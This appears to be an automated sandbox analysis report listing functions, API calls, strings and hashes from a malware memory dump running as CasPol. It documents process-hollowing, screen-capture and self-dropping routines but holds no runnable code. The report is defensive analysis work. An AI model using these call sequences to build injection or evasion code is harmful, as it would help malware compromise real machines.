Control Panel\Desktop, xrefs: 0041BBC2, 0041BBF5, 0041BC45
TileWallpaper, xrefs: 0041BC66

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF

Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
_wcschr.LIBVCRUNTIME ref: 00450C01
_wcschr.LIBVCRUNTIME ref: 00450C0F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769

Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408DAC
FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileFind$FirstH_prologNext
String ID:
API String ID: 301083792-0
Opcode ID: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
Opcode Fuzzy Hash: 63f9771ca86bd582bd3616e59cab3ba7d1ff64944245cac05fe2d569eb9bb920
Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98

Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58

Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434413), ref: 0043A765
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434413), ref: 0043A76F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434413), ref: 0043A77C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49

Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 00442585
TerminateProcess.KERNEL32(00000000,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000,?,00445408), ref: 0044258C
ExitProcess.KERNEL32 ref: 0044259E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88

Function 0044D5F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044D78C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54

Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA

Strings

GetLocaleInfoEx, xrefs: 004475B8, 004475C2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E

Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759

Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744

Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8

Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604

Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-0003D145,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB

EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49

Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754

Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
Instruction Fuzzy Hash:

Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0044E93E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615

Function 00417FAF Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
CreateCompatibleDC.GDI32(00000000), ref: 00417FD4

Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492

CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
DeleteDC.GDI32(?), ref: 0041806D
DeleteDC.GDI32(00000000), ref: 00418070
SelectObject.GDI32(00000000,00000000), ref: 0041807B
StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
GetIconInfo.USER32(?,?), ref: 004180DB
DeleteObject.GDI32(?), ref: 0041810A
DeleteObject.GDI32(?), ref: 00418117
DrawIcon.USER32(00000000,?,?,?), ref: 00418124
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
GetObjectA.GDI32(?,00000018,?), ref: 00418183
LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
DeleteDC.GDI32(?), ref: 0041828F
DeleteDC.GDI32(00000000), ref: 00418292
DeleteObject.GDI32(00000000), ref: 00418295
GlobalFree.KERNEL32(00CC0020), ref: 004182A0
DeleteObject.GDI32(00000000), ref: 00418354
GlobalFree.KERNEL32(?), ref: 0041835B
DeleteDC.GDI32(?), ref: 0041836B
DeleteDC.GDI32(00000000), ref: 00418376
DeleteDC.GDI32(?), ref: 004183A8
DeleteDC.GDI32(00000000), ref: 004183AB
DeleteObject.GDI32(?), ref: 004183B1

Strings

DISPLAY, xrefs: 00417FC2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
String ID: DISPLAY
API String ID: 1765752176-865373369
Opcode ID: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
Opcode Fuzzy Hash: 2257ed1409e9a1961a9d9eafba920a0f4d075fe48bda2856ce6cfd6cf2fe1e18
Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A

Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
GetProcAddress.KERNEL32(00000000), ref: 0041728F
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
GetProcAddress.KERNEL32(00000000), ref: 004172A3
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
GetProcAddress.KERNEL32(00000000), ref: 004172B7
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
GetProcAddress.KERNEL32(00000000), ref: 004172CB
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
TerminateProcess.KERNEL32(?,00000000), ref: 00417454
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
SetThreadContext.KERNEL32(?,00000000), ref: 00417575
ResumeThread.KERNEL32(?), ref: 00417582
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
GetCurrentProcess.KERNEL32(?), ref: 004175A5
TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
GetLastError.KERNEL32 ref: 004175C7

Strings

ntdll, xrefs: 00417277, 00417296, 004172AA, 004172BE
ZwMapViewOfSection, xrefs: 00417291
`#v, xrefs: 00417266
ZwClose, xrefs: 004172B9
ZwCreateSection, xrefs: 00417272
ZwUnmapViewOfSection, xrefs: 004172A5

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
API String ID: 4188446516-108836778
Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A

Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
ExitProcess.KERNEL32 ref: 0041151D

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B

Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1

Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE

Strings

0DG, xrefs: 004112C3
T@, xrefs: 00411361
.exe, xrefs: 0041142F
open, xrefs: 0041147D
@CG, xrefs: 004112E2
WDH, xrefs: 00411389, 004114F8
temp_, xrefs: 0041141D
exepath, xrefs: 00411308
